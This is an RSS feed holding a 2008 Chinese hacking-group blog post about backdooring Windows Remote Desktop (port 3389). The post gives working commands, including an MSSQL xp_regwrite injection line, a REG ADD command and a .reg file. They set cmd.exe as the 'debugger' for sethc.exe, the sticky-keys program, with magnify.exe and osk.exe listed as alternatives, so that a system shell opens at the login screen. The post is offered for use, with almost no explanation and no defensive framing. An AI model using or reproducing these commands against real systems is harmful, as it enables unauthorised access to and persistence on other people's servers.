<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>捞月 &#187; Terminal Server</title>
	<atom:link href="http://laoyue.chez.com/index.php/archives/tag/terminal-server/feed" rel="self" type="application/rss+xml" />
	<link>http://laoyue.chez.com</link>
	<description>旺旺旺~~~</description>
	<lastBuildDate>Mon, 20 Apr 2026 05:52:09 +0000</lastBuildDate>
	<language>zh-CN</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.8.41</generator>
	<item>
		<title>3389新思路</title>
		<link>http://laoyue.chez.com/index.php/archives/62</link>
		<comments>http://laoyue.chez.com/index.php/archives/62#comments</comments>
		<pubDate>Mon, 17 Nov 2008 14:27:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[3389]]></category>
		<category><![CDATA[Terminal Server]]></category>

		<guid isPermaLink="false">http://saoker.net/?p=62</guid>
		<description><![CDATA[版权所有：BK瞬间群 作者：BK群某饮料 1.能修改注册表 2.能访问3389 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';-- REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /f Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe] "debugger"="c:\\windows\\system32\\cmd.exe on" regedit /s             导入 .reg 文件进注册表（安静模式） /e             导出注册表文件 例：regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM magnify.exe osk.exe sethc.exe]]></description>
				<content:encoded><![CDATA[<div class="entry-content">
<p>版权所有：BK瞬间群<br />
作者：BK群某饮料</p>
<p>1.能修改注册表<br />
2.能访问3389</p>
<pre><code>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--</code></pre>
<p> </p>
<pre><code>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';--</code></pre>
<pre><code>REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /f</code></pre>
<pre><code>Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe]
"debugger"="c:\\windows\\system32\\cmd.exe on"</code></pre>
<p>regedit</p>
<p>/s             导入 .reg 文件进注册表（安静模式）</p>
<p>/e             导出注册表文件</p>
<p>例：regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM</p>
<p>magnify.exe</p>
<p>osk.exe</p>
<p>sethc.exe</p></div>
]]></content:encoded>
			<wfw:commentRss>http://laoyue.chez.com/index.php/archives/62/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
